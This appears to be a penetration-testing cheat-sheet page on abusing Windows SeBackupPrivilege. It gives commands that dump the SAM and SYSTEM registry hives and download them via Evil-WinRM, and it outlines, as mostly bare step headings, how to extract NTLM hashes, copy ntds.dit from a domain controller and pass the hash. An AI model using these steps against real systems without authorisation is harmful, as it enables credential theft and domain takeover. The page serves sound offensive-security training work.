search

SeBackupPrivilege

hashtag
Overview

  • Allows full read access to file system (bypasses ACLs)

  • Can read SAM, SYSTEM, and ntds.dit files

  • Common on Backup Operators group members

hashtag
Check for Privilege

whoami /priv

Look for SeBackupPrivilege in the output.

hashtag
Windows 10 / Standalone Machine

hashtag
1. Extract SAM and SYSTEM

cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

hashtag
2. Download Files (Evil-WinRM)

cd Temp
download sam
download system

hashtag
3. Extract Hashes

hashtag
4. Pass-the-Hash

hashtag
Domain Controller

hashtag
Method 1: Using DiskShadow + RoboCopy

1. Create DSH File (Kali)

2. Execute Backup (Target)

3. Download Files

4. Extract Hashes

5. Pass-the-Hash

hashtag
Method 2: Using DLL Files

1. Get DLL Files

Download from: https://github.com/giuliano108/SeBackupPrivilege

  • SeBackupPrivilegeUtils.dll

  • SeBackupPrivilegeCmdLets.dll

2. Upload Files

3. Import DLLs and Execute

4. Extract & Pass-the-Hash

Same as Method 1 (steps 3-5)

hashtag
Quick Reference

Target
Key Files
Tool

Standalone

SAM + SYSTEM

pypykatz

Domain Controller

ntds.dit + SYSTEM

secretsdump

Connection Tool: Evil-WinRM Hash Type: NTLM

PreviousWindows Privilege EscalationNextWinPrivEsc Enumeration

Last updated